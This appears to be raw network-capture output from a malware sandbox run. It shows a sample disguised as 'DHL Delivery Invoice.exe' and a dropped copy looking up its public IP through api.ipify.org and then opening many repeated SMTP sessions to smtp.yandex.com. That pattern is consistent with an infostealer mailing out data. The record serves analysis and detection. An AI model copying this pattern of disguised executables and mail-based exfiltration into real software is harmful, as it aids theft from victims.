                                                                                                                                Nov 27, 2024 19:19:28.296156883 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456401110 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456418991 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456492901 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456512928 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456554890 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456604004 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456613064 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456645966 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456727028 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456775904 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456779957 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456882954 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456902981 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456958055 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456970930 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456970930 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.458704948 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.577090979 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.577195883 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.577197075 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.577318907 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.697495937 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.697616100 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.697763920 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.698542118 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821310043 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821398020 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821517944 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821573019 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821592093 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821650982 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821806908 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821876049 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.862776995 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.862854958 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.951076984 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.951163054 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.951277971 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.951354980 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:29.063149929 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.075735092 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.075875998 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.106318951 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:29.195816040 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195858955 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195894957 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195924044 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195966005 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195993900 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196021080 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196048975 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196075916 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196109056 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196135998 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315777063 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315792084 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315809011 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315818071 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315859079 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315869093 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315934896 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316016912 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316025972 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316061974 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316097975 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.410415888 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.410487890 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:29.435653925 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435702085 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435735941 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435805082 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435832977 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435863972 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:30.274667025 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:30.326585054 CET50034587192.168.2.477.88.21.158
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 19:15:14.775259018 CET | 61512 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 19:15:14.952023029 CET | 53 | 61512 | 1.1.1.1 | 192.168.2.4
Nov 27, 2024 19:15:17.442326069 CET | 49832 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 19:15:18.310247898 CET | 53 | 49832 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 19:15:14.775259018 CET | 192.168.2.4 | 1.1.1.1 | 0xb321 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 27, 2024 19:15:17.442326069 CET | 192.168.2.4 | 1.1.1.1 | 0xacae | Standard query (0) | smtp.yandex.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 19:15:14.952023029 CET | 1.1.1.1 | 192.168.2.4 | 0xb321 | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 19:15:14.952023029 CET | 1.1.1.1 | 192.168.2.4 | 0xb321 | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 19:15:14.952023029 CET | 1.1.1.1 | 192.168.2.4 | 0xb321 | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 19:15:18.310247898 CET | 1.1.1.1 | 192.168.2.4 | 0xacae | No error (0) | smtp.yandex.com | smtp.yandex.ru | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 19:15:18.310247898 CET | 1.1.1.1 | 192.168.2.4 | 0xacae | No error (0) | smtp.yandex.ru | - | 77.88.21.158 | A (IP address) | IN (0x0001) | false
                                                                                                                                • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 104.26.12.205 | 443 | 2032 | C:\Users\user\Desktop\DHL Delivery Invoice.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-27 18:15:16 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-27 18:15:16 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Wed, 27 Nov 2024 18:15:16 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e941a48caeb0fa1-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1903520&cwnd=252&unsent_bytes=0&cid=30fdcb6e3cc14057&ts=522&x=0"
2024-11-27 18:15:16 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
Data Ascii: 8.46.123.75


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 104.26.12.205 | 443 | 7436 | C:\Users\user\AppData\Roaming\LIWBHGsz.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-27 18:15:20 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-27 18:15:21 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Wed, 27 Nov 2024 18:15:21 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e941a6508730cb2-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1560&rtt_var=588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1871794&cwnd=146&unsent_bytes=0&cid=21241de9939ceb74&ts=533&x=0"
2024-11-27 18:15:21 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
Data Ascii: 8.46.123.75


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 27, 2024 19:15:19.784538984 CET | 587 | 49735 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net Ok 1732731319-JFea5f0OeSw0
Nov 27, 2024 19:15:19.788817883 CET | 49735 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:15:20.241609097 CET | 587 | 49735 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:15:20.241791964 CET | 49735 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:15:20.700320005 CET | 587 | 49735 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:15:23.552289963 CET | 587 | 49738 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net Ok 1732731323-MFem4i0OjmI0
Nov 27, 2024 19:15:23.554558992 CET | 49738 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:15:24.041109085 CET | 587 | 49738 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:15:24.041301966 CET | 49738 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:15:24.642561913 CET | 587 | 49738 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:16:35.989707947 CET | 587 | 49820 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1732731395-ZGeSll0OkKo0
Nov 27, 2024 19:16:35.989877939 CET | 49820 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:16:36.458970070 CET | 587 | 49820 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:16:36.460949898 CET | 49820 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:16:36.917356968 CET | 587 | 49820 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:16:54.006361008 CET | 587 | 49857 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net Ok 1732731413-rGePZf0OqmI0
Nov 27, 2024 19:16:54.007723093 CET | 49857 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:16:54.572233915 CET | 587 | 49857 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:16:54.572470903 CET | 49857 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:16:55.084091902 CET | 587 | 49857 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:05.782105923 CET | 587 | 49882 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-54.vla.yp-c.yandex.net Ok 1732731425-5HeJIo0OeW20
Nov 27, 2024 19:17:05.782222986 CET | 49882 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:06.368886948 CET | 587 | 49882 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-54.vla.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:06.371643066 CET | 49882 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:06.877026081 CET | 587 | 49882 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:09.569925070 CET | 587 | 49891 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732731429-9HeGUr0OnGk0
Nov 27, 2024 19:17:09.573782921 CET | 49891 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:10.028413057 CET | 587 | 49891 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:10.028656960 CET | 49891 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:10.544131994 CET | 587 | 49891 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:25.494473934 CET | 587 | 49923 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net Ok 1732731445-PHeuVX0Ol4Y0
Nov 27, 2024 19:17:25.494637966 CET | 49923 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:26.031265020 CET | 587 | 49923 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:26.031404018 CET | 49923 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:26.490036964 CET | 587 | 49923 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:28.007865906 CET | 587 | 49929 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net Ok 1732731447-RHeCbe0OgmI0
Nov 27, 2024 19:17:28.008336067 CET | 49929 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:28.477503061 CET | 587 | 49929 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:28.478343010 CET | 49929 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:28.545458078 CET | 587 | 49932 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732731448-SHeJbr0OniE0
Nov 27, 2024 19:17:28.546442986 CET | 49932 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:28.979640961 CET | 587 | 49929 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:29.008690119 CET | 587 | 49932 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:29.010523081 CET | 49932 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:29.459299088 CET | 587 | 49932 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:32.368561029 CET | 587 | 49942 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net Ok 1732731452-VHea1h0OdqM0
Nov 27, 2024 19:17:32.370347023 CET | 49942 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:32.832662106 CET | 587 | 49942 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:32.833506107 CET | 49942 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:33.292459965 CET | 587 | 49942 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:35.433774948 CET | 587 | 49949 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-51.vla.yp-c.yandex.net Ok 1732731455-ZHenFr0OruQ0
Nov 27, 2024 19:17:35.433888912 CET | 49949 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:37.101612091 CET | 587 | 49955 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1732731456-aHeRKa0OcGk0
Nov 27, 2024 19:17:37.102360964 CET | 49955 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:37.561805010 CET | 587 | 49955 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:37.561934948 CET | 49955 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:38.003779888 CET | 587 | 49955 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:41.871741056 CET | 587 | 49966 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1732731461-fHe12c0On4Y0
Nov 27, 2024 19:17:41.871886015 CET | 49966 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:42.325591087 CET | 587 | 49966 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:42.326085091 CET | 49966 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:42.776951075 CET | 587 | 49966 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Nov 27, 2024 19:17:46.994261026 CET | 587 | 49976 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net Ok 1732731466-kHeV3p0OdeA0
Nov 27, 2024 19:17:46.994488955 CET | 49976 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 928100
Nov 27, 2024 19:17:47.519277096 CET | 587 | 49976 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 27, 2024 19:17:47.519428968 CET | 49976 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Nov 27, 2024 19:17:47.977327108 CET | 587 | 49976 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:05.199739933 CET5875001677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net Ok 1732731484-4IeMvt0Op4Y0
                                                                                                                                Nov 27, 2024 19:18:05.200962067 CET50016587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:05.660665989 CET5875001677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:05.661135912 CET  50016  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:18:06.116849899 CET  587  50016  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:14.747334003 CET  587  50026  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-81.vla.yp-c.yandex.net Ok 1732731494-EIegcg0OqeA0
                                                                                                                                Nov 27, 2024 19:18:14.747544050 CET  50026  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:15.195033073 CET  587  50026  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-81.vla.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:15.195240021 CET  50026  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:18:15.650046110 CET  587  50026  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:19.472358942 CET  587  50027  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732731499-JIeJur0Om8c0
                                                                                                                                Nov 27, 2024 19:18:19.473581076 CET  50027  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:19.943002939 CET  587  50027  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:19.943145990 CET  50027  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:18:20.601798058 CET  587  50027  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:35.948221922 CET  587  50028  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1732731515-ZIemYm0Or0U0
                                                                                                                                Nov 27, 2024 19:18:35.948364019 CET  50028  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:36.427022934 CET  587  50028  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:36.434393883 CET  50028  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:18:36.912491083 CET  587  50028  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:39.864389896 CET  587  50029  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-19.klg.yp-c.yandex.net Ok 1732731519-dIeAtn0OfOs0
                                                                                                                                Nov 27, 2024 19:18:39.864540100 CET  50029  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:40.324963093 CET  587  50029  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-19.klg.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:40.325102091 CET  50029  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:18:40.792325020 CET  587  50029  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:43.223130941 CET  587  50030  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net Ok 1732731522-gIeHVZ0OiGk0
                                                                                                                                Nov 27, 2024 19:18:43.226536989 CET  50030  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:43.687553883 CET  587  50030  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net
                                                                                                                                250-8BITMIME
